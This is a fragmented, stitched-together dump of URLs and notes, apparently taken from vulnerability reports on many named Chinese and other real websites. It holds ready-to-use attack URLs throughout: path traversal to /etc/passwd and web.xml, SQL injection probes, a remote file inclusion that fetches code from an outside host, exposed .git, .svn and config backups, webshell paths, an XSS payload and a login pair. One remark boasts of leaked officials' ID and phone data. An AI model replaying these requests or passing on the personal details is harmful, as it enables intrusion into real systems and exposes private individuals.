http://www.ccjdw.com/pkpmbs/jdmanage/TJdAjyuanList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdAjyuanList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdAjyuanList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdAjyuanList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdAjyuanList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdIdformatList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdIdformatList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdIdformatList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdIdformatList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdIdformatList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJgsjsList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJgsjsList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJgsjsList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJgsjsList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJgsjsList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJiancedanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJianlidanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJianshedanweList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJlgcsList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJlgcsList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJlgcsList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJlgcsList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJlgcsList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdJzsjsList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdJzsjsList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdJzsjsList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdJzsjsList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdJzsjsList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdKanchadanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdKcgcsList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdKcgcsList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdKcgcsList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdKcgcsList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdKcgcsList.aspx http://**.**.**/ www.jiananfinance.com/losePasswordbody http://183.61.39.187/brand/ http://183.61.39.187/sola/ http://183.61.39.187/brand/ http://183.61.39.187/sola/这个,因为上面那个目录并没有什么卵用。 http://passport.oa.com/modules/passport/signin.ashx?url=http://isux.oa.com/sola/ http://isux.oa.com/sola/upload.php http://isux.oa.com/sola/server/showPic.php http://isux.oa.com/sola/server/showPic.php http://bing.kuaidi100.com/postAjax.jsp?url=http://192.168.226.36/password/forgot.action&v=1.4 http://www.xinnet.com/mail/mail.html http://webmail.xinnet.asia/(可以是任意一个新网企业邮箱) http://webmail.xinnet.asia http://221.122.127.14:8080/ http://city.zol.com:80/bid_api/web/getDealers?bid=402880552acc07e2012acc09f7da08b8&jsoncallback=jsonp1434494827908&pid=659474311d9a63b029b0e5fd2a760b45&_=1434494829350&cid=ff8080812a881a21012a8984b2cb02a4 http://db.178.com/d3/cn/item-list/type:Belt&slot:&q:* http://db.178.com/zx2/equipment/displist/qu:1&class:1'%22&sex:all&slot:all android:name="com.igexin.download.DownloadReceiver android:name="android.net.conn.CONNECTIVITY_CHANGE"/ http://xiaozu.muzhiwan.com/interior http://www.schoolbest.com/individuation/Student/EnterSchool/Recruit_view.aspx http://218.108.93.206/individuation/Student/EnterSchool/Recruit_view.aspx http://218.108.24.122/individuation/Student/EnterSchool/Recruit_view.aspx http://www.zhhzx.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.xkzx.org/individuation/Student/EnterSchool/Recruit_view.aspx http://www.fysez.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.jdtcxx.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.fhqcxx.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.chwedu.com/individuation/Student/EnterSchool/Recruit_view.aspx http://www.jianlan.com.cn/individuation/Student/EnterSchool/Recruit_view.aspx http://www.zjoubbs.com/uc_server/data/config.inc.php.bak http://naotu.baidu.com/ android:name="com.ub.main.receiver.UboxReceiver android:name="android.intent.action.BOOT_COMPLETED"/ android:name="android.intent.action.PACKAGE_REPLACED"/ android:scheme="package"/ android:name="android.intent.action.ACTION_PACKAGE_ADDED"/ android:name="com.ub.main.receiver.BaiduPushReceiver android:name="com.baidu.android.pushservice.action.MESSAGE"/ android:name="com.baidu.android.pushservice.action.RECEIVE"/ android:name="com.baidu.android.pushservice.action.notification.CLICK"/ http://slms.sport.gov.cn/index.php http://www.duocaihua.net/admin/GoodsOrders.aspx http://oa.ciming.com/defaultroot/login.jsp,此处可用猪猪侠的top500用户名进行登陆,某账号内部邮箱里泄漏北京市司法局体检信息(看到了于泓源局长身份证)、北京飞流九天科技有限公司体检信息(有CEO倪县乐身份证号和电话号码)、紫竹经营体检信息、中信地产体检信息、慈铭内部通信录(韩小红总裁联系方式,将收集数据再作成字典,肯定能跑出更多账号),还有很多其它企业体检信息! http://oa.ciming.com/defaultroot/public/relation/relation_include_list.jsp?moduleType=information&infoId=23444077&showAdd=0&tagName=relationObjectDIV&iframeName=relationIFrame&relationview=1 http://mail.tsmc.com.cn/ http://mail.tsmc.com.cn http://61.135.147.90:4848/login.jsf http://61.135.147.33:4848/login.jsf http://61.135.147.33:8080/shell/syscon.jsp http://sws.qqdcw.com/audit/Memberinfomanage.aspx?PageNo=1&ClassID=44&keyword=&strxxzt=&strshzt=-1 http://sws.qqdcw.com/audit/MemberInfoAudit.aspx?ID=33290&ClassID=44&States=1 http://crm.emar.com/login/forgetpswd.php?orgcode=admin&loginname=admin* http://221.122.127.5:8161/admin/connections.jsp http://oa.xjrq.net/learn.asp?typeid='0 http://oa.xjrq.net/learn.asp?typeid='0 oa.xjrq.net/learn.asp?typeid='0 http://oa.xjrq.net/learn.asp?typeid='0 http://oa.xjrq.net/learn.asp?typeid='0 http://1.51.216.12/main.php http://ec.alpha.wochacha.com http://www.wooyun.org/bugs/wooyun-2015-0120022/trace/781cdd49ec2d5ce8629c466571f75701审核一下已经补充好啦,但是标题忘改了,应该是10处注入。 www.to8to.com http://www.shejiben.com/account/login.php http://www.shejiben.com/yz/3410927/ http://www.shejiben.com/sjs/998338/ http://www.shejiben.com/my/message.php?act=send&uid=1234567 http://www.shejiben.com/my/message.php?act=send&uid=1234567 http://218.31.133.92/admin/login.asp http://218.31.133.92/admin/article_list.asp?ChannelID=2&field=Editor&keyword=123 album.albumclass.list/pid/10080/top/c/c/*/1 http://221.122.127.6 http://221.122.127.7:9090/ http://fanxian.egou.com/checkEmail.do?email= http://www.homelinkhr.com/view_getPostListForCustomer.action?recruitType=DD0401&rows=9&page=1 http://weibo.cnsuning.com/ http://weibo.cnsuning.com/wap/就没有限制了 http://weibo.cnsuning.com/wap/index.php?mod=13076755 http://weibo.cnsuning.com/wap/index.php?mod=topic&code=modify&tid=1574624 http://103.255.94.252/ http://weixin.baifendian.com/ http://wiki.emar.com/ http://www.genevc.com/?m=invest&action=detail&id=740 http://www.gdaudit.gov.cn/ http://www.gdaudit.gov.cn/CVS/Entries http://www.gdaudit.gov.cn/userfiles/CVS/Entries http://www.gdaudit.gov.cn/system/CVS/Entries http://shoujitest.shouji.sogou.com/log.php?see=../../../../../../../../../../../../etc/passwd http://shoujitest.shouji.sogou.com/log.php?see=../../../../../../../../../../../../etc/httpd/conf/httpd.conf http://oa.fg.net.cn/index.asp http://112.124.41.23:38888/ http://oa.yf1668.com http://112.124.41.23:38888/DocFile/PeiXunXiaoGuo.aspx?PeiXunName= http://112.124.41.23:38888/Office/GuDingJiLu.aspx?GDName= http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName= http://112.124.41.23:38888/DocFile/DangAn.aspx?JuanKuName= http://112.124.41.23:38888/CRM/MyCustomLinkMan.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomService.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomPrice.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomLinkLog.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomNeed.aspx?CustomName= http://112.124.41.23:38888/CRM/MySongYang.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomHate.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomBack.aspx?CustomName= http://112.124.41.23:38888/Supply/BuyLog.aspx?OrderName= http://112.124.41.23:38888/Project/ShiShiRiZhi.aspx?ProjectName= http://112.124.41.23:38888/DocFile/PeiXunXiaoGuo.aspx http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName= http://112.124.41.23:38888/CRM/MyCustomLinkMan.aspx http://112.124.41.23:38888/CRM/MyCustomService.aspx?CustomName= http://112.124.41.23:38888/CRM/MyCustomPrice.aspx?CustomName= http://112.124.41.23:38888/DocFile/XueXiXinDeOK.aspx http://112.124.41.23:38888/Office/GuDingJiLu.as http://112.124.41.23:38888/DocFile/PeiXunRiJi.aspx?PeiXunName= http://demo.magicmail.com.cn:9988/ data:text/html;base64,PHNjcmlwdD5hbGVydCgvS2V5Ym9hcmQvKTwvc2NyaXB0Pgo= http://203.91.45.154/query/queryApproveState.action?cardId=&queryType=approveState http://fanxian.egou.com http://m.fang.com/client.jsp?produce=soufunrent http://**.**.** http://broker.guohualife.com/f1print/F1PrintKernelJ1.jsp?&RealPath=/etc/passwd http://221.122.127.5:8161/admin/ http://221.122.127.157:8161/admin/ http://wiki.emar.com/login.action http://www.czairport.com/search/order/my_RL/ZXLMyFlight.asp?OrderID=10122715052788 http://www.czairport.com/search/order/my_RL/ZXLMyFlight.asp?OrderID=10122715052788 http://www.zqts.com/article.aspx?cid=993 http://www.xiangguo.com/find/password http://uc.wasu.cn/.git/config http://play.wasu.cn/.git/config http://v.wasu.cn/.git/config http://travel.wasu.cn/.git/config http://vip.wasu.cn/.git/config http://hzuc.wasu.cn/.git/config http://live.wasu.cn/.git/config http://all.wasu.cn/.git/config http://zhuanti.wasu.cn/.git/config http://movie.wasu.cn/.git/config http://dianshiju.wasu.cn/.git/config http://dongman.wasu.cn/.git/config http://itv.wasu.cn/.git/config http://tops.wasu.cn/.git/config http://documentary.wasu.cn/.git/config http://ent.wasu.cn/.git/config http://sports.wasu.cn/.git/config http://zixun.wasu.cn/.git/config http://news.wasu.cn/.git/config http://wdy.wasu.cn/.git/config http://edu.wasu.cn/.git/config http://discovery.wasu.cn/.git/config http://auto.wasu.cn/.git/config http://house.wasu.cn/.git/config http://clientapi.wasu.cn/.git/config http://dv.wasu.cn/.git/config http://life.wasu.cn/.git/config http://uc.wasu.cn/.git/config http://oa.fg.net.cn/index.asp http://112.124.41.23:38888/ http://oa.yf1668.com http://112.124.41.23:38888/CRM/MyCustomNeed.aspx http://112.124.41.23:38888/CRM/MySongYang.aspx http://112.124.41.23:38888/CRM/MyCustomHate.aspx http://112.124.41.23:38888/CRM/MyCustomBack.aspx http://112.124.41.23:38888/Supply/BuyLog.aspx http://112.124.41.23:38888/Project/ShiShiRiZhi.aspx http://112.124.41.23:38888/Project/ShouKuan.aspx?ProjectName= http://112.124.41.23:38888/Project/ShouKuan.aspx?ProjectName= http://112.124.41.23:38888/Project/LiRuiGuanLi.aspx?ProjectName= http://112.124.41.23:38888/Project/LiRuiGuanLi.aspx?ProjectName= http://112.124.41.23:38888/Project/ProjectJinDu.aspx http://112.124.41.23:38888/Sell/SellLog.aspx?HeTongName= http://112.124.41.23:38888/Sell/SellLog.aspx?HeTongName= http://112.124.41.23:38888/Supply/SupplysLink.aspx?GongYingShang= http://112.124.41.23:38888/Supply/SupplysLink.aspx http://112.124.41.23:38888/Supply/BuyOrder.aspx http://112.124.41.23:38888/Supply/Supplys.aspx http://112.124.41.23:38888/Sell/Contract.aspx"--dbms="mssql http://112.124.41.23:38888/Car/CarLog.aspx http://112.124.41.23:38888/DocFile/DangAn.aspx http://112.124.41.23:38888/DocFile/DangAn.aspx http://ufcsp.ufida.com.cn/xmglnet/kmp/login.asp?link=/xmglnet/ufcsp/index.asp http://www.zsezt.com/u/member/index.php?do=cossion_view&cid=7090 http://passport.pptv.com/addmessage.do http://nehrc.nhri.org.tw/toxic/toxfaq_detail.php?id=132 http://sqlmap.org http://www.yijifen.com/forgetpwd.do http://**.**.**/login.php http://119.40.53.5/ x.cn/1.js http://websms.soufun.com/login http://61.241.82.144/这个IP,看这个系统的名字就觉得高大上 http://61.241.82.144:381/upload5warn/index_bak.jsp http://61.241.82.144:2585/ http://61.241.82.144:2585/exp/ashura.jsp http://61.241.82.144:2181/WebApp/emoss/getMessages.jsp#none http://www.timber2005.com/ http://www.timber2005.com/Product_sy.html http://px2.timber2005.com/ http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Course_Class_List_One.aspx?cid=27 http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Course_Class_List_One.aspx?cid=27%20and%201=user http://pms.qmango.com/manage/login.jsp http://pms.qmango.com http://pms.qmango.com/manage/shezhi/yonghu_edit.jsp?id=9539&waibao_id=14&loupan_id=11648 http://**.**.**/System/ http://yy.xmfybj.cn/image/img27.asp http://yy.xmfybj.cn/image/cantactme.asp http://jiameng.qmango.com/ http://jiameng.qmango.com/ http://joycenter.jd.com/msgCenter/getUnreadNum.action?callback=jsonp1434548327779 http://baitiao.jd.com/ious/queryBT?callback=jsonp1434548327780 http://giftcard.jd.com/service/getGiftCardCount.action?callback=jsonp1434548327781 http://quan.jd.com/getcouponcount.action?callback=jsonp1434548327782 http://h5.ujipin.com/.svn/entries http://wan.renren.com/bbs/plugin.php?action=../../../../../../../../../../etc/passwd%00&id=dc_mall&inajax=1 http://125.89.72.16:8080/EASPortalWebsite/login.aspx http://www.yc91.com/news_show.php?id=1506003492 http://116.55.21.152:81/Account/Login?returnUrl=%2F https://pactera.us/Platform/AdminMain/PortLogin.aspx?SysTokenRequest=5%24WQ3SpENiM7s1Hc7%2foBVa8hcJDzvemyyk3XaX6dvhVJP2xXLE13l2nklgQshlo8nVwQYPP7kvT2uad5unuafMZg7UQ3QYO1A7UG245kGof%2bURhTLj9vsbm3UkPGyeUnLjWFsPoQh6kcFoHNryHqe0gnlBaczFiMZtuVZVlQ8%2bf1MZka2FojD%2f5g%3d%3d http://bbs.rong360.com/config/config_global.php.bak http://218.90.184.158:8000/wxepi/存在注入漏洞 http://218.26.163.122:8080/SSO/loginAction!login.action;jsessionid=A45A080566E507BF721DEECB3676D5CE存在命令执行漏洞 http://zhidao.tuanche.com/question_30026/ http://218.22.2.190/index.php?controller=vodtwo&action=index&list=10 http://wooyun.org/bugs/wooyun-2015-0121224 http://webibj_s.10658.cc http://ms.clcn.net.cn:8080/sms/opac/user/getPictureAction.action?type=2&xc=5 https://ws2.singforlife.com.tw/sfl/login2A.asp http://118.144.35.112/ http://tj.ranknowcn.com/tj/recv.php?site=709&ar=1&type=1&posx=1&uid=1&imp=1&sid=-7345502201120765948&log= http://118.144.35.107/ http://118.144.35.107/System/Portal/ContentManage/WebUI/MoreInfo_List.aspx?IL_ID=9e31d24d-02ca-4a00-8a58-80a8004b83d9 http://mail.chenghua.gov.cn/extmail/cgi/index.cgi http://www.dybank.net/web.rar http://www.itpub.net/source/plugin/itpub_medal/medalimgs.tar.gz http://j1.esf.sina.com.cn/login发现是没有验证码的,也没有https加密协议的 http://www2.gdlottery.cn/user_toLogin.do存在命令执行 www2.gdlottery.cn/123.txt http://food.2626.com.tw/index.action http://ibztv.bzcm.net/msfdj/?d=48存在注入漏洞 http://ibztv.bzcm.net/live_admin/admin.php http://interface.huanqiu.com/.svn/entries http://shurufa.eastday.com/.svn/entries https://www.ahpi.gov.cn/defaultroot/login.jsp http://preview.php.net/.git/config http://hk.php.net/.git/config http://shared.php.net/.git/config http://br.php.net/.git/config http://br1.php.net/.git/config http://br2.php.net/.git/config http://master.php.net/.git/config http://master.php.net/.git/config http://mail.php.net/.git/config http://qa.php.net/.git/config http://qa.php.net/.git/config http://nc.php.net/.git/config http://nc1.php.net/.git/config http://bd.php.net/.git/config http://bd1.php.net/.git/config http://tw2.php.net/.git/config http://mx.php.net/.git/config http://lxr.php.net/.git/config http://hk2.php.net/.git/config http://mx1.php.net/.git/config http://at1.php.net/.git/config http://ua2.php.net/.git/config http://ua.php.net/.git/config http://pt2.php.net/.git/config http://dk.php.net/.git/config http://dk1.php.net/.git/config http://id.php.net/.git/config http://id1.php.net/.git/config http://th.php.net/.git/config http://jm2.php.net/.git/config http://jm.php.net/.git/config http://de.php.net/.git/config http://de1.php.net/.git/config http://se2.php.net/.git/config http://is.php.net/.git/config http://ca.php.net/.git/config http://li.php.net/.git/config http://pl1.php.net/.git/config http://pl.php.net/.git/config http://jp2.php.net/.git/config http://ca1.php.net/.git/config http://us2.php.net/.git/config http://ca2.php.net/.git/config http://es.php.net/.git/config http://es1.php.net/.git/config http://se.php.net/.git/config http://it1.php.net/.git/config http://is2.php.net/.git/config http://bg.php.net/.git/config http://bg2.php.net/.git/config http://docs.php.net/.git/config http://euk2.php.net/.git/config http://md1.php.net/.git/config http://preview.php.net/.git/config http://www.ccjdw.com/INFOBLXX.aspx http://218.7.239.170:81/INFOBLXX.aspx http://www.jljszj.gov.cn/INFOBLXX.aspx http://www.thszjz.com/INFOBLXX.aspx http://www.spjdz.com/INFOBLXX.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdSgyuanList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdSgyuanList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdSgyuanList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdSgyuanList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdSgyuanList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdShejidanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdShentudanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdShigongdanweiList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdXmjlList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdXmjlList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdXmjlList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdXmjlList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdXmjlList.aspx http://www.ccjdw.com/pkpmbs/jdmanage/TJdZjyuanList.aspx http://218.7.239.170:81/pkpmbs/jdmanage/TJdZjyuanList.aspx http://www.jljszj.gov.cn/pkpmbs/jdmanage/TJdZjyuanList.aspx http://www.thszjz.com/pkpmbs/jdmanage/TJdZjyuanList.aspx http://www.spjdz.com/pkpmbs/jdmanage/TJdZjyuanList.aspx http://www.ccjdw.com/pkpmbs/manager/userfolderlist.aspx http://218.7.239.170:81/pkpmbs/manager/userfolderlist.aspx http://www.jljszj.gov.cn/pkpmbs/manager/userfolderlist.aspx http://www.thszjz.com/pkpmbs/manager/userfolderlist.aspx http://www.spjdz.com/pkpmbs/manager/userfolderlist.aspx http://www.ccjdw.com//pkpmbs/portal/InfocontentList.aspx http://218.7.239.170:81//pkpmbs/portal/InfocontentList.aspx http://www.jljszj.gov.cn//pkpmbs/portal/InfocontentList.aspx http://www.thszjz.com//pkpmbs/portal/InfocontentList.aspx http://www.spjdz.com//pkpmbs/portal/InfocontentList.aspx http://www.ccjdw.com//pkpmbs/portal/InfoContentTreeList.aspx http://218.7.239.170:81/pkpmbs/portal/InfoContentTreeList.aspx http://www.jljszj.gov.cn/pkpmbs/portal/InfoContentTreeList.aspx http://www.thszjz.com/pkpmbs/portal/InfoContentTreeList.aspx http://www.spjdz.com/pkpmbs/portal/InfoContentTreeList.aspx http://www.ccjdw.com//pkpmbs/portal/YzgcList.aspx http://218.7.239.170:81//pkpmbs/portal/YzgcList.aspx http://www.jljszj.gov.cn/pkpmbs/portal/YzgcList.aspx http://www.thszjz.com/pkpmbs/portal/YzgcList.aspx http://www.spjdz.com/pkpmbs/portal/YzgcList.aspx http://www.ccjdw.com/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://218.7.239.170:81/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://www.thszjz.com/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://www.spjdz.com/pkpmbs//jdmanage/jdprojarchivesmenulist.aspx http://www.ccjdw.com/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://218.7.239.170:81/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://www.jljszj.gov.cn/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://www.thszjz.com/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://www.spjdz.com/pkpmbs//jdmanage/GlobalItmViewOutColList.aspx http://www.ccjdw.com//pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://218.7.239.170:81/pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://www.jljszj.gov.cn/pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://www.thszjz.com/pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://www.spjdz.com/pkpmbs/jddoc/googlemap/addProjectLocation.aspx http://www.ccjdw.com//pkpmbs/jddoc/googlemap/AddGPS.aspx http://218.7.239.170:81//pkpmbs/jddoc/googlemap/AddGPS.aspx http://www.jljszj.gov.cn//pkpmbs/jddoc/googlemap/AddGPS.aspx http://www.thszjz.com//pkpmbs/jddoc/googlemap/AddGPS.aspx http://www.spjdz.com//pkpmbs/jddoc/googlemap/AddGPS.aspx http://www.ccjdw.com/pkpmbs/manager/sysuserlist.aspx http://218.7.239.170:81/pkpmbs/manager/sysuserlist.aspx http://www.jljszj.gov.cn/pkpmbs/manager/sysuserlist.aspx http://www.thszjz.com/pkpmbs/manager/sysuserlist.aspx http://www.spjdz.com/pkpmbs/manager/sysuserlist.aspx http://www.ccjdw.com//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://www.jljszj.gov.cn//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://www.thszjz.com//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://www.spjdz.com//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://218.7.239.170:81//pkpmbs/consmodel/TBpModifyLogList.aspx?ClassName=CESC http://www.ccjdw.com/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://218.7.239.170:81/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://www.jljszj.gov.cn/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://www.thszjz.com/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://www.spjdz.com/pkpmbs/jddoc/iSignature/Signature_DocEdit.aspx?exist=&page=1&ITMID=&CODE= http://www.ccjdw.com/pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://www.jljszj.gov.cn//pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://www.thszjz.com//pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://www.spjdz.com//pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://218.7.239.170:81//pkpmbs/CMQuery/CommonManager/QueryParameterList.aspx?queryid=1 http://www.ccjdw.com/pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://218.27.1.143//pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://www.jljszj.gov.cn//pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://www.thszjz.com/pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://www.spjdz.com/pkpmbs/CMQuery/QueryParameter.aspx?__queryid__=VdCc%2biXrsP0%3d http://www.wepiao.com/?a=filmdetail&c=film&m=web&fid=5452 http://www.wepiao.com/?a=cinemadetailshow&c=cinema&m=web&cinemaid=1002069 http://www.wepiao.com/?a=seatinfo&c=film&mpid=5574e033ba8e7fbb7d8b56f5&scheid=&m=web&cinemaid=1002069&hid=8&fid=5577 http://rs.tongji.edu.cn/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://yjs.njau.edu.cn/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://ssgl.whu.edu.cn//epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://www.urp.fudan.edu.cn:86/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml http://rs.whu.edu.cn//epstar/servlet/RaqFileServer?action=open&fileName=../../WEB-INF/web.xml http://211.64.123.12/bj_client/App_Pages/App_page/FAQDetail.aspx?ID=667 http://59.73.148.27:8080/bj_server//App_Pages/App_page/FAQDetail.aspx?ID=667 http://218.195.234.37/oa_server//App_Pages/App_page/FAQDetail.aspx?ID=667 http://lib.heuet.edu.cn:8080/bj_client/App_Pages/App_page/FAQDetail.aspx?ID=667 http://vrs.lib.xju.edu.cn/oa_server//App_Pages/App_page/FAQDetail.aspx?ID=667 http://www.aircraft_co.avic.com/productconent.php?id=221&pid=28&cat_id=49 http://jw.sxjgxy.edu.cn//web/web/lanmu/wenzhaishow.asp?id=44 http://score.xaau.edu.cn//web/web/lanmu/wenzhaishow.asp?id=44 http://220.167.53.63:81//web/web/lanmu/wenzhaishow.asp?id=44 http://www.cdtlgcxx.com:2110//web/web/lanmu/wenzhaishow.asp?id=44 http://jwmis.dzvtc.edu.cn/web/web/lanmu/wenzhaishow.asp?id=44 http://www.xrnet.cn/store/content.php?type=IcpVs&module=http%3A%2F%2Frangetool.wc.lt%2F1.txt%3F http://kb.xrnet.cn/store/content.php?module=http%3A%2F%2Frangetool.wc.lt%2F1.txt%3F http://hy.xrnet.cn/store/content.php?module=http%3A%2F%2Frangetool.wc.lt%2F1.txt%3F http://uctest.ucweb.com:81/wml/auth.php?referer=/ ludi:ludi http://timber2005.com/ http://timber2005.com/Customer.html http://px2.timber2005.com http://px2.timber2005.com/WebPage/Paying.aspx?infoid=403 http://px2.timber2005.com/WebPage/Paying.aspx?infoid=403 http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Case_Download.aspx?infoid=4 http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Case_Download.aspx?infoid=4 http://px2.timber2005.com/Webpage/Personcenterd/Classroom/Case_Download.aspx?infoid=4 URL:http://b2b.citsgd.com.cn/tuan/?tuan_cust_id=221857 m.mama.cn/index.php?a=SafeFood&d=search&g=Wap http://www.xl-group.com.cn/manage/login.aspx http://www.xl-group.com.cn/search.aspx?keywords= android:icon="@drawable/wk_browser_icon android:label="@string/act_browser_label android:name=".ui.activity.WkBrowserActivity android:theme="@android:style/Theme.NoTitleBar android:name="android.intent.action.VIEW android:name="android.intent.category.DEFAULT android:name="android.intent.category.BROWSABLE android:scheme="http 